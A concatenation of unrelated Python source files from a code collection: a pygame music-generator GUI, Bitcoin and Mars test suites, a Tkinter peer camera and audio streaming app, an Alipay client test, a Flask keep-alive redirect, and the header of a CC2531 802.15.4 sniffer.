self.gui_print_text("Random values assigned to all fields.")
for item in self.buttons + self.gauges:
item.randomize_value()
self.check_events()
self.screen.fill((50, 50, 50))
bot_bar = pygame.Surface((FRAME_WIDTH, int(FRAME_HEIGHT * 0.10)))
self.screen.blit(bot_bar, (0, FRAME_HEIGHT - bot_bar.get_height()))
bot_bar.fill((0, 0, 0))
self.gui_print()
for item in self.buttons + self.gauges + self.bleeps:
if dt > 0.05:
dt = 0.05
item.update(dt)
item.draw(self.screen)
if item in self.bleeps:
if item.radius > item.max_radius:
self.bleeps.remove(item)
self.draw_titles()
if to_generate:
black = pygame.Surface((FRAME_WIDTH, int(FRAME_HEIGHT * 0.9)))
black.fill((0, 0, 0))
black.set_alpha(100)
self.screen.blit(black, (0, 0))
self.bleeps = []
screen = pygame.transform.scale(self.screen, WINDOW_SIZE)
self.screen_commit.blit(screen, (0, 0))
pygame.display.flip()
if to_generate:
self.show_spinner()
lead_instrument = a.label_to_instrument[lead_instrument_button.texts[lead_instrument_button.mode]]
comp_instrument = a.label_to_instrument[comp_instrument_button.texts[comp_instrument_button.mode]]
enables = [lead_enable.toggled, snare_enable.toggled, bass_enable.toggled, comp_enable.toggled]
self.loading = True
self.song_to_generate = a
self.generated_file_name = None
self.gen_args = {"lead_instrument": lead_instrument,
"comp_instrument": comp_instrument,
"enables": enables}
t = threading.Thread(target=self.generate_song)
t.start()
while threading.active_count() > 1:
self.update_and_draw_spinner()
self.check_for_pygame_exit()
self.loading = False
self.gui_print_text("%s generated and ready for playback." % self.generated_file_name)
self.hide_spinner()
def generate_song(self):
args = self.gen_args
self.generated_file_name = self.song_to_generate.generate_preset_0(**args)
sys.exit() # Close current thread
def update_and_draw_spinner(self):
screen = pygame.transform.scale(self.screen, WINDOW_SIZE)
now = time.time()
dt = now - self.last_spinner_draw
self.last_spinner_draw = now
self.screen_commit.blit(screen, (0, 0))
self.spinner_sprite.update(dt)
self.spinner_sprite.draw()
pygame.display.flip()
def show_spinner(self):
self.spinner_sprite.show()
def hide_spinner(self):
self.spinner_sprite.hide()
def check_for_pygame_exit(self):
events = pygame.event.get()
for event in events:
if event.type == pygame.QUIT:
pygame.quit()
self.close_all_threads()
def close_all_threads(self):
os._exit(1)
def check_events(self):
mouse_pos = pygame.mouse.get_pos()
click = False
old_click = self.click
new_click = pygame.mouse.get_pressed()[0]
self.check_for_pygame_exit()
self.clicked = []
if new_click and not old_click:
click = True
self.bleeps.append(Bleep(mouse_pos))
self.click = new_click
for button in self.buttons + self.gauges:
this_button_clicked = button.mouse_over(mouse_pos, click=click, held=new_click)
if this_button_clicked:
self.clicked.append(button)
class SpinnerSprite(object):
def __init__(self, screen):
super(SpinnerSprite, self).__init__()
self.screen = screen
self.images = []
self.tps = 3.5 # Number of 30-degree tooth increments turned each second
self.pps = 1 # Number of scale pulses each second
self.age = 0
self.visible = True
self.index = 0
self.spinner = pygame.image.load("images/spinner/frame-1.png")
self.x = WINDOW_WIDTH/2
self.y = WINDOW_HEIGHT/2
self.pulse_amplitude = 0.08 # Proportion of scale increase with pulse
self.scale = 0 # Starting scale
def show(self):
self.age = 0
self.visible = True
def hide(self):
self.visible = False
def update(self, dt):
if not self.visible:
return
self.age += dt
angle = (self.age * self.tps * 30) % 30
self.max_scale = self.age
self.scale = self.pulse_amplitude * math.sin(self.pps * 2 * math.pi * self.age) + 1
img = pygame.transform.rotozoom(self.spinner, -angle, min(self.scale, self.max_scale))
self.image = img
def draw(self):
if not self.visible:
return
x = int(self.x - self.image.get_width()/2)
y = int(self.y - self.image.get_width()/2)
self.screen.blit(self.image, (x, y))
class Bleep(object):
def __init__(self, pos):
self.x = int(pos[0]*SCALE_X)
self.y = int(pos[1]*SCALE_Y)
self.pos = [self.x, self.y]
self.radius = 1
self.max_radius = 20
def update(self, dt):
self.radius += dt * 150.0
def draw(self, screen):
pygame.draw.circle(screen, (255, 255, 255), self.pos, int(self.radius*SCALE_X), 2)
class Button(object):
def __init__(self, text="BUTTON", size=(0.2, 0.05), pos=(0.1, 0.1)):
self.width = size[0]
self.height = size[1]
self.pos = pos
self.x = int(self.pos[0] * FRAME_WIDTH)
self.y = int(self.pos[1] * FRAME_HEIGHT)
self.w = int(self.width * FRAME_HEIGHT)
self.h = int(self.height * FRAME_HEIGHT)
self.text = text
self.button_font = pygame.font.Font(fp("Myriad.otf"), int(16*SCALE_X))
self.button_font_render = self.button_font.render(self.text, 1, (0, 0, 0))
self.brr_w = self.button_font_render.get_width()
self.brr_h = self.button_font_render.get_height()
self.hovered = 0
self.hover_scale = 1.05
self.cur_scale = 1.0
self.target_scale = 1.0
self.h_color = (255, 255, 255)
self.color = (200, 200, 200)
self.toggled = 0
def randomize_value(self):
pass
def mouse_over(self, mpos, click=False, held=False):
clicked = 0
x, y = mpos
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
if click:
self.toggled = 1 - self.toggled
self.cur_scale = 1.3
clicked = 1
self.hovered = True
return clicked
self.hovered = False
return clicked
def draw(self, screen):
if self.hovered:
color = self.h_color
else:
color = self.color
self.brr_w = self.button_font_render.get_width()
self.brr_h = self.button_font_render.get_height()
width = int(self.w * self.cur_scale)
height = int(self.h * self.cur_scale)
xdif = int((width - self.w) / 2)
ydif = int((height - self.h) / 2)
self.target_scale = self.hover_scale
if not self.hovered:
self.target_scale = 1.0
button_surf = pygame.Surface((self.w, self.h))
button_surf.fill(color)
font_center_pos = (int(self.x + self.w / 2), int(self.y + self.h / 2))
font_pos = (int(font_center_pos[0] - self.brr_w / 2),
int(font_center_pos[1] - self.brr_h / 2))
button_surf.blit(self.button_font_render, (self.w / 2 - self.brr_w / 2, self.h / 2 - self.brr_h / 2))
shadow = pygame.Surface((self.w, self.h / 2))
shadow.fill((0, 0, 0))
shadow.set_alpha(40)
button_surf.blit(shadow, (0, self.h / 2))
xoff = 0
yoff = 0
button_surf = pygame.transform.scale(button_surf, (int(self.w * self.cur_scale), int(self.h * self.cur_scale)))
screen.blit(button_surf, (self.x - xdif, self.y - ydif))
def update(self, dt):
ds = -self.cur_scale + self.target_scale
self.cur_scale += ds * dt * 20
class ToggleButton(Button):
def __init__(self, text="DISABLED", size=(0.2, 0.05), pos=(0.1, 0.1), toggle_text="ENABLED"):
Button.__init__(self, text=text, size=size, pos=pos)
self.toggled = True
self.untoggled_color = (100, 100, 100)
self.untoggled_color_2 = (120, 120, 120)
self.toggled_color = GREEN
self.toggled_color_2 = [c + 20 for c in GREEN]
self.untoggle_text = text
self.toggle_text = toggle_text
self.button_font_render_untoggled = self.button_font_render.copy()
self.button_font_render_toggled = self.button_font.render(self.toggle_text, 1, (0, 0, 0))
def randomize_value(self):
self.cur_scale = 1.3
self.toggled = 0
if rd.random() < 0.75:
self.toggled = 1
def update(self, dt):
ds = -self.cur_scale + self.target_scale
self.cur_scale += ds * dt * 20
if not self.toggled:
self.text = self.untoggle_text
self.button_font_render = self.button_font_render_untoggled
self.color = self.untoggled_color
self.h_color = self.untoggled_color_2
else:
self.text = self.toggle_text
self.button_font_render = self.button_font_render_toggled
self.color = self.toggled_color
self.h_color = self.toggled_color_2
class ModeButton(Button):
def __init__(self, texts=["MODE 1", "MODE 2", "MODE 3"], size=(0.2, 0.05), pos=(0.1, 0.1), start_mode=0):
Button.__init__(self, text=texts[0], size=size, pos=pos)
self.colors = {}
self.modes = [i for i in range(len(texts))]
self.colors = [COLORS[i % len(COLORS)] for i in self.modes]
self.hover_colors = [(min(c[0] + 20, 255), min(c[1] + 20, 255), min(c[2] + 20, 255)) for c in self.colors]
self.mode = self.modes[start_mode]
self.color = self.colors[self.mode]
self.h_color = self.hover_colors[self.mode]
self.texts = texts
self.font_renders = [self.button_font.render(texts[mode], 1, (0, 0, 0)) for mode in self.modes]
self.button_font_render = self.font_renders[start_mode]
# self.button_font_render = self.button_font.render(self.text, 1, (0, 0, 0))
def set_mode(self, mode):
self.cur_scale = 1.3
self.mode = mode
self.color = self.colors[self.mode]
self.h_color = self.hover_colors[self.mode]
self.button_font_render = self.font_renders[self.mode]
def randomize_value(self):
self.set_mode(rd.choice(self.modes))
def mouse_over(self, mpos, click=False, held=False):
clicked = 0
x, y = mpos
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
if click:
self.toggled = 1 - self.toggled
self.cur_scale = 1.3
self.set_mode((self.mode + 1) % len(self.modes))
self.hovered = True
return clicked
self.hovered = False
return clicked
class Gauge(object):
def __init__(self, size=(0.4, 0.05), pos=(0.1, 0.1), max_val=1.0, min_val=0, starting_val=0.5, bar_color=RED,
label="GAUGE"):
self.w = size[0] * FRAME_WIDTH
self.h = size[1] * FRAME_HEIGHT
self.x = pos[0] * FRAME_WIDTH
self.y = pos[1] * FRAME_HEIGHT
self.background_color = (90, 90, 90)
self.meter_color = bar_color
self.meter_highlight = [min(c + 25, 255) for c in bar_color]
self.meter_text_color = (0, 0, 0) # [min(c+50, 255) for c in self.meter_highlight]
self.value = starting_val
self.max_val = max_val
self.min_val = min_val
self.dragging = 0
self.scale = 1.0
self.target_scale = 1.0
self.h_scale = 1.03
label_font = pygame.font.Font(fp("Myriad.otf"), int(16 * SCALE_X))
self.label = label_font.render(label, 1, self.meter_text_color)
def randomize_value(self):
self.scale = 1.12
per = rd.random()
self.value = per * (self.max_val - self.min_val) + self.min_val
def draw(self, screen):
meter_color = self.meter_color
if self.hovered or self.dragging:
meter_color = self.meter_highlight
back = pygame.Surface((int(self.w * self.scale), int(self.h * self.scale)))
back.fill(self.background_color)
per_val = 1.0 * (self.value - self.min_val) / (self.max_val - self.min_val)
meter = pygame.Surface((int(self.w * self.scale * per_val), int(self.h * self.scale)))
meter.fill(meter_color)
w = int(self.w * self.scale)
h = int(self.h * self.scale)
xdif = int(w - self.w) / 2
ydif = int(h - self.h) / 2
shadow = pygame.Surface((w, h))
shadow.fill((0, 0, 0))
shadow.set_alpha(40)
back.blit(meter, (0, 0))
back.blit(self.label, (int(10 * SCALE_X), h / 2 - self.label.get_height() / 2))
back = pygame.transform.scale(back, (w, h))
back.blit(shadow, (0, h / 2))
screen.blit(back, (self.x - xdif, self.y - ydif))
def update(self, dt):
if self.hovered or self.dragging:
self.target_scale = self.h_scale
else:
self.target_scale = 1.0
ds = -self.scale + self.target_scale
self.scale += ds * dt * 20
def mouse_over(self, mpos, click=False, held=False):
x, y = mpos
if self.dragging and not held:
self.dragging = False
self.scale = 1.08
if self.dragging:
bar_min = self.x / SCALE_X
bar_max = self.x / SCALE_X + self.w / SCALE_X
percent = 1.0 * (x - bar_min) / (bar_max - bar_min)
percent = max(min(percent, 1.0), 0.0)
self.value = (self.max_val - self.min_val) * percent + self.min_val
if x >= self.x / SCALE_X and x <= self.x / SCALE_X + self.w / SCALE_X:
if y >= self.y / SCALE_Y and y <= self.y / SCALE_Y + self.h / SCALE_Y:
self.hovered = True
if click:
self.dragging = True
elif not held:
self.dragging = False
return
self.hovered = False
if __name__ == '__main__':
a = MusGUI()
pass
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test lksd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
test_session.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2020 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import sys
import tempfile
from collections import namedtuple
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError: # pragma: no cover
pa = None
import mars.tensor as mt
import mars.dataframe as md
import mars.remote as mr
from mars.config import option_context
from mars.deploy.utils import load_service_config_file
from mars.session import execute, fetch, fetch_log
test_namedtuple_type = namedtuple('TestNamedTuple', 'a b')
@pytest.fixture
def setup():
from ..deploy.oscar.tests.session import new_test_session
sess = new_test_session(address='127.0.0.1',
init_local=True,
default=True)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_session_async_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
expected = raw_a.sum()
res = a.sum().to_numpy(wait=False).result()
assert expected == res
res = a.sum().execute(wait=False)
res = res.result().fetch()
assert expected == res
raw_df = pd.DataFrame(raw_a)
expected = raw_df.sum()
df = md.DataFrame(a)
res = df.sum().to_pandas(wait=False).result()
pd.testing.assert_series_equal(expected, res)
res = df.sum().execute(wait=False)
res = res.result().fetch()
pd.testing.assert_series_equal(expected, res)
t = [df.sum(), a.sum()]
res = mt.ExecutableTuple(t).to_object(wait=False).result()
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
res = mt.ExecutableTuple(t).execute(wait=False)
res = fetch(*res.result())
pd.testing.assert_series_equal(raw_df.sum(), res[0])
assert raw_a.sum() == res[1]
def test_executable_tuple_execute(setup):
raw_a = np.random.RandomState(0).rand(10, 20)
a = mt.tensor(raw_a)
raw_df = pd.DataFrame(raw_a)
df = md.DataFrame(raw_df)
tp = test_namedtuple_type(a, df)
executable_tp = mt.ExecutableTuple(tp)
assert 'a' in dir(executable_tp)
assert executable_tp.a is a
assert test_namedtuple_type.__name__ in repr(executable_tp)
with pytest.raises(AttributeError):
getattr(executable_tp, 'c')
res = mt.ExecutableTuple(tp).execute().fetch()
assert test_namedtuple_type is type(res)
np.testing.assert_array_equal(raw_a, res.a)
pd.testing.assert_frame_equal(raw_df, res.b)
def test_multiple_output_execute(setup):
data = np.random.random((5, 9))
# test multiple outputs
arr1 = mt.tensor(data.copy(), chunk_size=3)
result = mt.modf(arr1).execute().fetch()
expected = np.modf(data)
np.testing.assert_array_equal(result[0], expected[0])
np.testing.assert_array_equal(result[1], expected[1])
# test 1 output
arr2 = mt.tensor(data.copy(), chunk_size=3)
result = ((arr2 + 1) * 2).to_numpy()
expected = (data + 1) * 2
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
arr3 = mt.tensor(data.copy(), chunk_size=3)
arrs = mt.split(arr3, 3, axis=1)
result = arrs[0].to_numpy()
expected = np.split(data, 3, axis=1)[0]
np.testing.assert_array_equal(result, expected)
# test multiple outputs, but only execute 1
data = np.random.randint(0, 10, (5, 5))
arr3 = (mt.tensor(data) + 1) * 2
arrs = mt.linalg.qr(arr3)
result = (arrs[0] + 1).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 1
np.testing.assert_array_almost_equal(result, expected)
result = (arrs[0] + 2).to_numpy()
expected = np.linalg.qr((data + 1) * 2)[0] + 2
np.testing.assert_array_almost_equal(result, expected)
s = mt.shape(0)
result = s.execute().fetch()
expected = np.shape(0)
assert result == expected
def test_closed_session():
from ..deploy.oscar.tests.session import new_test_session
session = new_test_session(default=True)
with option_context({'show_progress': False}):
arr = mt.ones((10, 10))
result = session.execute(arr)
np.testing.assert_array_equal(result, np.ones((10, 10)))
# close session
session.close()
with pytest.raises(RuntimeError):
session.execute(arr)
with pytest.raises(RuntimeError):
session.execute(arr + 1)
def test_array_protocol(setup):
arr = mt.ones((10, 20))
result = np.asarray(arr)
np.testing.assert_array_equal(result, np.ones((10, 20)))
arr2 = mt.ones((10, 20))
result = np.asarray(arr2, mt.bool_)
np.testing.assert_array_equal(result, np.ones((10, 20), dtype=np.bool_))
arr3 = mt.ones((10, 20)).sum()
result = np.asarray(arr3)
np.testing.assert_array_equal(result, np.asarray(200))
arr4 = mt.ones((10, 20)).sum()
result = np.asarray(arr4, dtype=np.float_)
np.testing.assert_array_equal(result, np.asarray(200, dtype=np.float_))
def test_without_fuse(setup):
arr1 = (mt.ones((10, 10), chunk_size=6) + 1) * 2
r1 = arr1.execute(fuse_enabled=False).fetch()
arr2 = (mt.ones((10, 10), chunk_size=5) + 1) * 2
r2 = arr2.execute(fuse_enabled=False).fetch()
np.testing.assert_array_equal(r1, r2)
def test_fetch_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
r1 = arr1.execute().fetch()
r2 = arr1[:2, 3:9].fetch()
np.testing.assert_array_equal(r2, r1[:2, 3:9])
r3 = arr1[0].fetch()
np.testing.assert_array_equal(r3, r1[0])
def test_fetch_dataframe_slices(setup):
arr1 = mt.random.rand(10, 8, chunk_size=3)
df1 = md.DataFrame(arr1)
r1 = df1.execute().fetch()
r2 = df1.iloc[:, :].fetch()
pd.testing.assert_frame_equal(r2, r1.iloc[:, :])
r3 = df1.iloc[1].fetch(extra_config={'check_series_name': False})
pd.testing.assert_series_equal(r3, r1.iloc[1])
r4 = df1.iloc[0, 2].fetch()
assert r4 == r1.iloc[0, 2]
arr2 = mt.random.rand(10, 3, chunk_size=3)
df2 = md.DataFrame(arr2)
r5 = df2.execute().fetch()
r6 = df2.iloc[:4].fetch(batch_size=3)
pd.testing.assert_frame_equal(r5.iloc[:4], r6)
def test_repr(setup):
# test tensor repr
with np.printoptions(threshold=100):
arr = np.random.randint(1000, size=(11, 4, 13))
t = mt.tensor(arr, chunk_size=3)
result = repr(t.execute())
expected = repr(arr)
assert result == expected
for size in (5, 58, 60, 62, 64):
pdf = pd.DataFrame(np.random.randint(1000, size=(size, 10)))
# test DataFrame repr
df = md.DataFrame(pdf, chunk_size=size//2)
result = repr(df.execute())
expected = repr(pdf)
assert result == expected
# test DataFrame _repr_html_
result = df.execute()._repr_html_()
expected = pdf._repr_html_()
assert result == expected
# test Series repr
ps = pdf[0]
s = md.Series(ps, chunk_size=size//2)
result = repr(s.execute())
expected = repr(ps)
assert result == expected
# test Index repr
pind = pd.date_range('2020-1-1', periods=10)
ind = md.Index(pind, chunk_size=5)
assert 'DatetimeIndex' in repr(ind.execute())
# test groupby repr
df = md.DataFrame(pd.DataFrame(np.random.rand(100, 3), columns=list('abc')))
grouped = df.groupby(['a', 'b']).execute()
assert 'DataFrameGroupBy' in repr(grouped)
# test Categorical repr
c = md.qcut(range(5), 3)
assert 'Categorical' in repr(c)
assert 'Categorical' in str(c)
assert repr(c.execute()) == repr(pd.qcut(range(5), 3))
def test_iter(setup):
raw_data = pd.DataFrame(np.random.randint(1000, size=(20, 10)))
df = md.DataFrame(raw_data, chunk_size=5)
for col, series in df.iteritems():
pd.testing.assert_series_equal(series.execute().fetch(), raw_data[col])
for i, batch in enumerate(df.iterbatch(batch_size=15)):
pd.testing.assert_frame_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_row, expect_row in zip(df.iterrows(batch_size=15),
raw_data.iterrows()):
assert result_row[0] == expect_row[0]
pd.testing.assert_series_equal(result_row[1], expect_row[1])
i += 1
assert i == len(raw_data)
i = 0
for result_tup, expect_tup in zip(df.itertuples(batch_size=10),
raw_data.itertuples()):
assert result_tup == expect_tup
i += 1
assert i == len(raw_data)
raw_data = pd.Series(np.random.randint(1000, size=(20,)))
s = md.Series(raw_data, chunk_size=5)
for i, batch in enumerate(s.iterbatch(batch_size=15)):
pd.testing.assert_series_equal(batch, raw_data.iloc[i * 15: (i + 1) * 15])
i = 0
for result_item, expect_item in zip(s.iteritems(batch_size=15),
raw_data.iteritems()):
assert result_item[0] == expect_item[0]
assert result_item[1] == expect_item[1]
i += 1
assert i == len(raw_data)
# test to_dict
assert s.to_dict() == raw_data.to_dict()
CONFIG = """
inherits: '@default'
session:
custom_log_dir: '{custom_log_dir}'
"""
@pytest.fixture
def fetch_log_setup():
from ..deploy.oscar.tests.session import new_test_session
with tempfile.TemporaryDirectory() as temp_dir:
config = io.StringIO(CONFIG.format(custom_log_dir=temp_dir))
sess = new_test_session(default=True,
config=load_service_config_file(config),
n_cpu=8)
with option_context({'show_progress': False}):
try:
yield sess
finally:
sess.stop_server()
def test_fetch_log(fetch_log_setup):
def f():
print('test')
r = mr.spawn(f)
r.execute()
log = r.fetch_log()
assert str(log).strip() == 'test'
# test multiple functions
def f1(size):
print('f1' * size)
sys.stdout.flush()
fs = mr.ExecutableTuple([mr.spawn(f1, 30), mr.spawn(f1, 40)])
execute(*fs)
log = fetch_log(*fs, offsets=20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30)[20:30]
assert str(log[1]).strip() == ('f1' * 40)[20:30]
assert len(log[0].offsets) > 0
assert all(s > 0 for s in log[0].offsets)
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets)
assert len(log[0].chunk_op_keys) > 0
# test negative offsets
log = fs.fetch_log(offsets=-20, sizes=10)
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
# test negative offsets which represented in string
log = fetch_log(*fs, offsets='-0.02K', sizes='0.01K')
assert str(log[0]).strip() == ('f1' * 30 + '\n')[-20:-10]
assert str(log[1]).strip() == ('f1' * 40 + '\n')[-20:-10]
assert all(s > 0 for s in log[0].offsets) is True
assert len(log[1].offsets) > 0
assert all(s > 0 for s in log[1].offsets) is True
assert len(log[0].chunk_op_keys) > 0
def test_nested():
print('level0')
fr = mr.spawn(f1, 1)
fr.execute()
print(fr.fetch_log())
r = mr.spawn(test_nested)
r.execute()
log = str(r.fetch_log())
assert 'level0' in log
assert 'f1' in log
df = md.DataFrame(mt.random.rand(10, 3), chunk_size=5)
def df_func(c):
print('df func')
return c
df2 = df.map_chunk(df_func)
df2.execute()
log = df2.fetch_log()
assert 'Chunk op key:' in str(log)
assert 'df func' in repr(log)
assert len(str(df.fetch_log())) == 0
def test_host(rndf):
rm = mr.spawn(nested, rndf)
rm.execute()
print(rm.fetch_log())
def nested(_rndf):
print('log_content')
ds = [mr.spawn(test_host, n, retry_when_fail=False)
for n in np.random.rand(4)]
xtp = execute(*ds)
for log in fetch_log(*xtp):
assert str(log).strip() == 'log_content'
def test_threaded():
import threading
exc_info = None
def print_fun():
nonlocal exc_info
try:
print('inner')
except: # noqa: E722 # nosec # pylint: disable=bare-except
exc_info = sys.exc_info()
print_thread = threading.Thread(target=print_fun)
print_thread.start()
print_thread.join()
if exc_info is not None:
raise exc_info[1].with_traceback(exc_info[-1])
print('after')
rm = mr.spawn(test_threaded)
rm.execute()
logs = str(rm.fetch_log()).strip()
assert logs == 'inner\nafter'
|
secondcam.py
|
import tkinter as tk
from tkinter import *
import socket
import threading
from vidstream import *
black = '#000000'
white = '#ffffff'
color = '#EFFBB1'
color1 = '#CBF0AA'
color2 = '#F0A9C0'
color3 = '#CD93CF'
color4 = '#D6F72D'
local_ip = socket.gethostbyname(socket.gethostname())
print(local_ip)
server = StreamingServer(local_ip, 7777)
receiver = AudioReceiver(local_ip, 6666)
class App:
def __init__(self):
def start_listening(self):
self.t1 = threading.Thread(target=server.start_server)
self.t2 = threading.Thread(target=receiver.start_server)
self.t1.start()
self.t2.start()
def start_camera_stream(self):
camera_client = CameraClient(self.text.get(1.0, 'end-1c'), 9999)
self.t3 = threading.Thread(target=camera_client.start_stream)
self.t3.start() ###feito
def start_screen_sharing(self):
screen_sharing_client = ScreenShareClient(self.text.get(1.0, 'end-1c'), 9999)
self.t4 = threading.Thread(target=screen_sharing_client.start_stream)
self.t4.start() ###feito
def start_audio_stream(self):
audio_sender = AudioSender(self.text.get(1.0, 'end-1c'), 8888)
self.t5 = threading.Thread(target=audio_sender.start_stream)
self.t5.start() ###feito
def screen(self):
self.window = tk.Tk()
self.window.title('WebRTC Player')
self.window.geometry('300x300')
self.window.configure(bg=color)
def ip_adress(self):
label = Label(self.window, bg=color, text='IP do seu amigo')
label.place(x=10, y=10)
self.text = Text(self.window, height=1, width=20)
self.text.place(x=10, y=30)
def buttons(self):
listen = Button(self.window, text='Comece à ouvir', command=lambda:start_listening(self))
listen.place(x=50, y=70)
camera = Button(self.window, text='Câmera ao vivo', command=lambda:start_camera_stream(self))
camera.place(x=50, y=120)
share = Button(self.window, text='Compartilhe sua Câmera', command=lambda:start_screen_sharing(self))
share.place(x=50, y=170)
audio = Button(self.window, text='Compartilhe seu áudio', command=lambda:start_audio_stream(self))
audio.place(x=50, y=220)
if self.window.protocol("WM_DELETE_WINDOW"):
server.stop_server()
receiver.stop_server()
screen(self)
ip_adress(self)
buttons(self)
self.window.mainloop()
app = App()
|
test_client.py
|
import unittest
from antchain_alipay_util.client import Client
from Tea.exceptions import TeaException
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
class Request(BaseHTTPRequestHandler):
def do_PUT(self):
body = self.rfile.read(int(self.headers['content-length']))
assert body == b'test python'
expected = self.headers['expected']
if expected == 'success':
self.send_response(200)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(b'''<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>OK</Code>
</Error>''')
else:
self.send_response(400)
self.send_header('Content-type', 'application/xml')
self.end_headers()
self.wfile.write(b'''<?xml version="1.0" encoding="UTF-8"?>
<Error>
<Code>NoSuchKey</Code>
</Error>''')
def run_server():
server = HTTPServer(('localhost', 8888), Request)
server.serve_forever()
class TestClient(unittest.TestCase):
@classmethod
def setUpClass(cls):
server = threading.Thread(target=run_server)
server.setDaemon(True)
server.start()
def test_get_timestamp(self):
timestamp = Client.get_timestamp()
self.assertEqual(20, len(timestamp))
def test_has_error(self):
tmp = 'testInvalidJson'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"noResponse":"true"}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"false"},"sign":"IUl/4uLq7utFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"}}'
resp = Client.has_error(tmp, 'secret', 'success')
self.assertTrue(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"},"sign":"IUl/4uLq7utFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertFalse(resp)
tmp = '{"response":{"expired_time":"2021-01-04T17:04:42.072+08:00","file_id":"kjiac1a298f8d","req_msg_id":' \
'"79e093b3ae0f3f2c1","result_code":"OK"},"sign":"IUl/4uLqtFnsjF1Zy6B6OWbCg="}'
resp = Client.has_error(tmp, 'secret', 'ok')
self.assertTrue(resp)
def test_get_signature(self):
params = {
'test': 'ok'
}
signature = Client.get_signature(params, 'secret')
self.assertEqual('qlB4B1lFcehlWRelL7Fo4uNHPCs=', signature)
def test_get_nonce(self):
self.assertEqual(32, len(Client.get_nonce()))
def test_parse_upload_headers(self):
res = Client.parse_upload_headers(12)
self.assertEqual({}, res)
res = Client.parse_upload_headers('{"test":"ok"}')
self.assertEqual({}, res)
res = Client.parse_upload_headers([
{
"name": "content-type",
"value": "text",
},
{
"name": "content-md5",
"value": "md5value",
},
])
self.assertEqual('text', res['content-type'])
self.assertEqual('md5value', res['content-md5'])
def test_put_object(self):
url = 'http://127.0.0.1:8888'
with open('test.txt', 'rb') as f:
Client.put_object(f, {'expected': 'success'}, url)
with open('test.txt', 'rb') as f:
try:
Client.put_object(f, {'expected': 'fail'}, url)
assert False
except TeaException as e:
self.assertEqual('NoSuchKey', e.code)
self.assertEqual(400, e.data['httpCode'])
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return '<meta http-equiv="refresh" content="0; URL=https://darkshadoow159258.github.io"/>'
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
|
sniffer.py
|
# -*- coding: UTF-8 -*-
#/**
# * Software name: CC2531
# * Version: 0.1.0
# * Library to drive TI CC2531 802.15.4 dongle to monitor channels
# * Copyright (C) 2013 Benoit Michau, ANSSI.
# *
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the CeCILL-B license as published here:
# * http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# *
# *--------------------------------------------------------
# * File Name : sniffer.py
# * Created : 2013-11-13
# * Authors : Benoit Michau, ANSSI
# *--------------------------------------------------------
# */
#!/usr/bin/python2
#
###
# 802.15.4 monitor based on Texas Instruments CC2531 USB dongle
#
# uses libusb1
# http://www.libusb.org/
# and python-libusb1
# https://github.com/vpelletier/python-libusb1/
###
#
#
# This is the main executable program
#
# dataflow:
